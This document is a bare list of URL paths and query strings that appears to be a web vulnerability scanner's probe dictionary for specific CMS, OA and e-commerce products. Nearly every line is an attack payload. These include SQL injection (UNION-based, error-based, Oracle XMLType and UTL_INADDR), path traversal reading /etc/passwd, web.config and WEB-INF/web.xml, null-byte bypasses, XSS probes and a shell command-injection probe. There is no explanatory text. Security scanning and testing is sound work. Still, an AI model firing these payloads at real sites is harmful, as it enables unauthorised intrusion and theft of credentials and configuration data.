/getBibliographicByLibId?documentType=1'%20UNION%20ALL%20SELECT%20NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL--%20&libId=&_=
/install/install.php?action=setup&dbhost=0.0.0.0&port=3306&dbname=webscan&dbuser=rerejj&dbpassword=nEwPa$$Wr0d&tableprefix=shop_&guid=1
/module/voting/commonlist.jsp?classid=0&queid=-12)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&m=yes&inlay=yes&answer=
/myPaper/dk_zxksView.aspx?ksType=0&tID=-12')/**/and/**/1=char(106)--&ecID=1&ModuleID=78
/Logon?action=logon
/UserSecurityController.do?method=getPassword&step=2&userName=admin
/webSend/entity_show.jsp?unid=-1'%20or%201=2%20--&fileName=webscan.jsp
/common/down.jsp?filepath=%5Ccommon%5Cdown.jsp&filename=webscan.txt
/OA/renshigongzi/modifyDangAn.asp?id=-1'%20UNION%20%20all%20SELECT%201,tname,null,null,null,0x7765627363616E3A693A66696E64,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20teachers--
/showmanufacturer.aspx?categoryfilterid=-12%20and%201=char(106)&manufacturerfilterid=1&distributorfilterid=0&affiliatefilterid=0&customerlevelfilterid=0&producttypefilterid=0&show=all
/general/crm/apps/crm/include/import/export.php
/Admin/LianXi.aspx?LianXiType=PingMian'%20AND%201122=char(106)%20--
/Admin/SelYangNews.aspx?NewsType=PingMianZhongXinTuPian'%20AND%201212=char(106)%20--
/admin/others.asp?mudi=download_EN_CN&ENname=../config.asp&CNname=config.asp
/cms/conf/system.xml
/erp/reportmanage/taskreport/lljinduadd.aspx
/oa/erp/SalePlan/YearPlanAdd.aspx
/oa/student/mainsubject_zixuan.asp?selyears=&seltestname='/**/and/**/1=char(106)--&selgrade=&selclass=&submit1=%B2%E9%D1%AF&%CC%E5%D3%FD=%CC%E5%D3%FD
/oa/student/fenduan.asp?selyears=&selgrade=&seltestname=&selsubject='/**/and/**/1=char(106)--&manfen=100&buchang=20&submit1=%B2%E9%D1%AF
/oa/student/ChengJiGenZong.asp?id='/**/and/**/1=char(106)--&%D3%EF%CE%C4=%D3%EF%CE%C4&%CA%FD%D1%A7=%CA%FD%D1%A7&submit1=%B2%E9%D1%AF
/downTemp.aspx?type=downDb&fileName=../web.config
/showproduct.aspx?ProductID=6559&CategoryFilterID=-51%20or%201=char(106)
/showsearch.aspx?HotSearchWord=-1';%20if(12=13)%20select%201234%20else%20drop%20function%20jjyy%20--
/cms/jsp/communique/zwxx_zfgb.jsp?more=1&columnNameValue=2%27%20UNION%20ALL%20SELECT%20chr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%20FROM%20DUAL--&moreZongQi=021
/datacenter/global/login.do?bg=../../../../../../../../../../etc/passwd
/user/?q=help&type=search&page=1&kw=webscan%22;%20alert(42873);//&lang=zh_CN
/admin?code=1&n=webscan%22%20onmouseover=alert(42873);%20//
/admin/manage.jsp
/shipinbofang.jsp?TID=-1234'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL%20FROM%20DUAL--%20&ColumnID=86
/content/detail.php?sid=2%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7765627363616E3A693A66696E64,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&cid=105&id=1
/mod/shop/quest/ajax.php?op=auction_buy
/wei/js.php?type=like&keyword=1%2527)/**/UNION/**/SELECT/**/1,concat(0x7e,0x7765627363616E3A693A66696E64,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23
/news/js.php?type=like&keyword=1%2527)/**/and/**/(select/**/1/**/from/**//**/(select/**/count(*),concat((select/**/concat(0x7e,0x7765627363616E3A693A66696E64,0x7e)/**/from/**/1tc_members/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**//**/information_schema.tables/**/group/**/by/**/x)a)%23
/mod/payment/quest.php?op=check&page=b2b
/mod/ntga/jwsview.php
/uploadd.php
/jserr.php?jsstr=%3Cimg%20src=@%20onerror=alert(42873)%20/%3E
/admin/backup.aspx
/mod/mad/video_upload.php
/business/buildingrooms_xml.asp?cancelBldroomShow=2&client_buildID=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&client_mainno=0&client_mainTable=unrelatedresource&client_realtypeID=-1&client_showMode=&client_showRoomCond=&client_stanID=1610&floorEnd=-100&floorStart=-100&functiontype=6&pmBldRoomID=undefined&roomNoEnd=-100&roomNoStart=-100&sid=
/SelNews.aspx?NewsType=DongTaiNewsType=1'%20and%201=char(106)%20--
/Website/OnlineSurveyResults.jsp?idhao=1'%20union%20all%20select%20null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(60)%20from%20sysibm.sysdummy1--
/frontProduct/search.ac
/Website/contentshow.jsp?ColumnCode=-12'%20union%20all%20select%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)%20from%20DUAL%20--
/Website/newsshow.jsp?id=-12%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL%20FROM%20DUAL
/FileManages/NetworkDisk/QxSet1.aspx?id=38%20%20and+1=char(106)+--
/website/approve/convenientSiteAction!getSXList.action?department=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&mill=488&style=4
/website/approve/approveSiteAction!listApproveModel.action?action=search&forward=searchmodel&issueTypename=&style=4&subType=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
/website/approve/approveSiteAction!findApproveGuide.action?businesscode=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&location=&subcode=000
/bookdetail.aspx?id=-311%20union%20all%20Select%208%2CCHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8--
/znSearchAction.do?searchContext=-1%25%27%20UNION%20%20ALL%20SELECT%20%20NULL%2CNULL%2CCHR%28119%29%7C%7CCHR%28101%29%7C%7CCHR%2898%29%7C%7CCHR%28115%29%7C%7CCHR%2899%29%7C%7CCHR%2897%29%7C%7CCHR%28110%29%7C%7CCHR%2858%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28100%29%2CNULL%20FROM%20DUAL%20--
/opac/ckgc.jsp?kzh=-1')%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/cms/framework/dbfile/createdbfile.jsp
/CN/item/downloadFile.jsp?filedisplay=../../web-inf/web.xml
/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../../../etc/passwd
/FileManages/FolderQxSet/FileModify.aspx?type=2&fileid=3%20and+1=char(106)%20--&path=/1
/interface/ugo.php?OA_USER=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(0x7c,0x484B3A693A31393937,0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271
/inc/finger/use_finger.php?USER_ID=-123%bf'%20and%20extractvalue(1,%20concat(0x5c,(select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201)))%23
/general/ems/query/search_excel.php?LOGIN_USER_ID=1%bf%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23&EMS_TYPE=1
/general/ems/manage/search_excel.php?LOGIN_USER_ID=1&EMS_TYPE=1%e5%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23
/backup/backup/backup.asp
/module/AIP/get_file.php?MODULE=/&ATTACHMENT_ID=.._webroot/inc/oa_config&ATTACHMENT_NAME=php
/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
/admini/item/iteminfo.aspx
/admini/newstopic/newstopicinfo.aspx
/download?fileName=/WEB-INF/web.xml
/RecruitstuManage/schoolinfo/DetailTheme.aspx?type=-1&topicid=1'%20and%201=char(106)%20--
/index_lnlqcj.php
/main/model/childcatalog/fileFind.do?fcode=00103&title=-111%25%27%20union%20all%20select%20null%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--&Submit=%CB%D1%CB%F7
/scrp/feedbackdetail.cfm?iSno=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
/poweb/CDHelp.jsp?ISOID=3'%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,char%28104%29%2bchar%28107%29%2bchar%2858%29%2bchar%2849%29%2bchar%2858%29%2bchar%2849%29%2bchar%2857%29%2bchar%2857%29%2bchar%2855%29,null,null,null%20%20--%20
/information/OA_InforList.asp
/information/OA_PingLun.asp?PLType=1&POAID=54'%20and+1=char(106)%20--
/information_manager/informationmanager_upload.jsp?upload=1&dispControl=null&saveControl=null
/public/jsp/multiuploadfile.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&photos=null
/public/jsp/smartUploadPic.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jspx,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0
/jdwz/qtpage/findAllPoint.jsp?dtcxlb=vcsfjg&point_name=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2CNULL--%20&vcsfjg=all
/jdwz/newsAction.do?flag=flag&NewsId=-12'%20union%20all%20select%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29,12,12,12,12,12,12,12,12--
/caigou/NoticeList.aspx?Type=%27%2b+(select+convert(int%2cCHAR(106)%2bCHAR(105)%2bCHAR(120))+FROM+syscolumns)+%2b%27
/MailExportDo.asp?dellist=-1234%29%20or%203438%3DCONVERT%28INT%2C%28SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2b%28SELECT%20%28CASE%20WHEN%20%288986%3D8986%29%20THEN%20CHAR%28105%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%29%29%20%20AND%20%281602%3D1602
/mailClassInfor.asp
/MessageInfoDis.asp?VOID=26%20and%201122%3DCONVERT%28INT%2C%28SELECT%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%29%29%20--
/Include/DepartmentSet_Right.aspx?BI_ID=1'%20and%20(select%2b(char(106)%2bchar(120)%2bchar(106)%2bchar(120)))%3E0--
/jcms/m_1_9/user/down.jsp?pathfile=../jcms/m_1_9/user/down.jsp
/tophp.asp
/Manage/CalendarMemo/event.ashx
/RuvarHRM/web_common/file_download.aspx?hr_file_storage_id=1')%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/bbsSet/BoardInfo.aspx?board_id=-1'%20and%20(select%20char(106)%2bchar(106))%3E0--&level=1
/SysManage/include/SelectUnderling.aspx?u_underling=(select%20char(106)%2bchar(106)))--'
/SysManage/MailSet/select_mail.aspx?corp_id=(select%20char(106)%2bchar(106))%20--
/workflow/OfficeFileDownload.aspx?filename=1'%20and%20(select%20char(106)%2bchar(106))%3E0%20--
/SysManage/get_department.aspx?corpID=char(106)%2bchar(106)
/SysManage/role_setting_new.aspx?id=char(106)%2bchar(106)
/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=%CF%C3%C3%C5%B4%F3%D1%A7&subject1=0&subject2=0&name=%25%27%20AND%201122%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%28104%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2849%29%7C%7CCHR%2857%29%7C%7CCHR%2857%29%7C%7CCHR%2855%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27
/oa/download_attach.aspx?attach_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/departmentset_corpshow.aspx?bi_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/role_show.aspx?role_id=char(106)%2bchar(106)
/lates/index.html?username=123%27%2f%2a%2a%2fand%2f%2a%2a%2f%28seleselectct%2f%2a%2a%2f1%2f%2a%2a%2ffrom%2f%2a%2a%2f%28selselectect%2f%2a%2a%2fcount%28%2a%29%2Cconcat%280x7c%2C0x7765627363616E3A693A66696E64%2C0x7c%2Cfloor%28rand%280%29%2a2%29%29x%2f%2a%2a%2ffrom%2f%2a%2a%2finformation_schema.tables%2f%2a%2a%2fgroup%2f%2a%2a%2fby%2f%2a%2a%2fx%29a%29%23
/kaoqin/JiaoYanDis.asp
/admin/accounts_list.aspx?u_department_id=1'%20and%20(char(106)%2bchar(106))%3E0--
/tj/list.aspx?typeid=1'%20and%20(char(106)%2bchar(106))%3E0--
/filemanage/FolderPower.aspx?folder=1'%20and%20(char(106)%2bchar(106))%3E0--
/OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=-12'%20and%20(char(106)%2bchar(106))%3E0--&sp=amdin&oid=0&type=2
/Manage/CalendarMemo/load.ashx
/php/report/include/ldap.inc
/php/report/include/util.inc
/php/report/include/config.inc
/php/report/lastlogin_list_export.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
/user/storage_explore.php
/grad/admin/domain_logo.php
/user/storage_fold_explore.php
/php/mailaction1.php?action=x&index=1.2;echo+123456%3Ex1.txt
/user/send_queue/upload_addition.php
/php/report/search_lastlogin.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
/php/bill/list_userinfo.php?domain=site.org&ok=1&cp=1%20union%20select%20md5(1122),2,3,4,5%23
/grad/admin/admin_logo_upload.php
/common/codewidget.jsp?code=1'%20AND%201=char(106)%20--
/download.ashx?files=../web.config
/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise
/?question/search/%27%75nion%20select%201,2,3,4,5,6,7,8,md5(1122),10,11,12,13,14,15,16,17,18,19,20%23
/jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd
/Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey
/jis/manage/databak/showlog.jsp?path=../showlog.jsp
/download.jsp?path=UserFiles/../download.jsp
/tt/trade/register.asp?step=checkdup&checkname=ologinname&checkval=haha'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&pk=0
/zwgkinfo/DepartMentInfoList.aspx?CategoryNum=-12'/**/and/**/1=char(106)--&DeptCode=
/jis/interface/offer.jsp?flag=user
/jis/down.jsp?pathfile=./down.jsp%00.jpg
/MockLogin.aspx
/mobile/user.php?act=order_list
/seeyon/management/status.jsp
/api/download.ashx?fid=nUDWEgdorSH4j/+9GiQTlA==
/monitoring?part=web.xml
/?/s_tag/hehe%25%27%20union%20select%201,2,3,md5(1122),5,6,7%20from%20go_admin%23
/download.action?fullPath=./WEB-INF/web.xml
/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig
/jis/update/update.jsp?fn_billstatus=U
/install/install.php
/public/minify.php?f=../ooxxooxxo/hehe.js
/admin/index.asp
/plus/outside.php?id=../template/default/style/yun_index.css%00
/productpic.aspx?id=100611)%20and%201=char(106)%20--
/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd
/jsp/util/file_download.jsp?filePath=c:%5Cwindows%5Cwin.ini%00.xml
/jcms/m_5_5/m_5_5_3/import.jsp
/upload!uploadImg.action
/AuthReturn.aspx?APTokenResponse=a$8SOIYyiGVYBge5mdoY5nIeAueY7BixUtLdHqpy8o3RqM9hVnisaXAA==
/?do=index&mod=goods
/index.php/*123*/'union/**/select/**/1,2,3,4,5,6,7,8,md5(1122),10,11%23&action=getatlbyid
/cart.aspx?act=spikebuy&spikeid=3%20and%201=char(106)%2bchar(120)%20--
/webmail/client/mail/index.php?module=operate&action=down&file=./../../mainconfig.php
/MoreIndex.aspx?pkId=6434&kw=a'%20and%201=char(106)%20--&st=2&t=1
/RuvarHRM/web_include/select_baseinfo.aspx?bt_name=1')%20%20and%20(char(106)%2bchar(106))%3E0--
/Default.aspx?item=1)%20and%201=(char(106)%2bchar(106))%20--
/news/searchNewsAction.shtml?keywords='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
/zwfw/zwfwInfoAction!execute.shtml?action=5&sid='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
/news/newsInfoAction.shtml?infotype=-1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20and%20'at'='at
/client/checkuser.aspx?user=test'%20and%20char(106)%3E0--&pwd=1
/siteserver/userRole/modal_sendMail.aspx?From=User&UserNameCollection=test'+and+char(106)%2bchar(106)=0%20--
/admin/include/config.php?depth=../../templates/default/images/css/metinfo.css%00
/admin/login/login_check.php?depth=../../templates/default/images/css/metinfo.css%00&admin_index=1
/admin/system/lang/lang.func.php?depth=../../../public/js/public.js%00
/webusr/check.aspx?loginname=nosec'%20and%201=char(106)%2bchar(106)%20--%20
/plugins/phpdisk_client/client_sub.php?action=upload_file
/ExhibitionCenter.aspx?area=-12'%20and/**/1=char(106)/**/--
/SupplyList.aspx?parentid=88&classid=-12%20and/**/1=char(106)/**/%20--%20
/company/SearchProducts.aspx?id=115&keyname=ppp%25'%20and/**/1=char(106)/**/%20--%20
/Web/Login.aspx
/Web/KeySearch.aspx?searchid=1234
/portal/admin/setright.aspx?id=-1
/infolist.aspx?ClassId=5)%20and%201122=CONVERT(INT,(SELECT%20CHAR(84)%2bCHAR(97)%2bCHAR(105)%2bCHAR(87)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(103)%2bCHAR(111)%2bCHAR(58)%2bCHAR(104)%2bCHAR(111)%2bCHAR(109)%2bCHAR(101)))%20AND%20(1=1
/guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,char(106)%2bchar(106)%2bchar(108)%20--
/prog/filedown.php?pe_id=MQ==
/emlib4/system/DataSource/GetDataGridCtrlResult.aspx?_debug_=undefined
/emlib4/format/release/aspx/eml_userwh.aspx
/voteresult.aspx?activeid=-1%20UNION%20SELECT%201,char(106)%2bchar(106),3,4,5%20from%20syscolumns%20--
/kbase_list.aspx?kcatid=1%20UNION%20SELECT%201,2,char(106)%2bchar(106),4,5,6,7,8%20from%20syscolumns--
/getTopLinksPortalCategoriesAction.action?siteId=../../../../../../../../../../windows/win.ini%00.jpg
/letter/letter_detail.aspx?id=8'%20%20and+1=char(106)%2bchar(106)%20--
/cms/infopub/rss.jsp?channelcode=-A%27%20union%20all%20select%20char%28106%29%2bchar%28106%29%2Cnull%2Cnull%2Cnull%20--&maxnum=20
/web/doc_hit.jsp?documentid=-21%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
/OperationManage/BlogMoreIndex.aspx?pkId=&blogId=1&kw=abc'%20and%201=char(106)%20--&st=1&t=1
/Tools/stream/FlvStream.ashx?file=./Index.aspx
/tj/total.aspx?act=other&typeid=1%27%20AND%209518%3DCONVERT%28INT%2C%28SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2b%28SELECT%20%28CASE%20WHEN%20%289518%3D9518%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2bCHAR%28100%29%29%29%29%20AND%20%27xhJK%27%3D%27xhJK
/webConfigSet/configSetting.aspx?url=/login/index.aspx
/cms/cms/infopub/gjjs.jsp?pubtype=S&pubpath=dkt&startdate=&enddate=&topic=&content=&authorname=&origin=&description=&webappcode=A02&searchdir=A02&templetid=-21'%20union%20all%20select%20char(106)%2bchar(62)%2bchar(60),null,null%20--
/mydocument/download.aspx
/prog/get_passwd_1.php?user=hehe%3Cscript%3Ealert(42873)%3C/script%3E%20
/cjwtlist.aspx?t=(select+convert(int%2c@@version))
/FormBuilder/PrintFormList.aspx?file_id=1)/**/UNION/**/ALL/**/SELECT/**/CHR(97)%7C%7CCHR(60)%7C%7CCHR(99),NULL/**/FROM/**/DUAL/**/--
/module/sitesearch/index.jsp?keyword=&columnid=-1650)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&keyvalue=&webid=&currpage=2
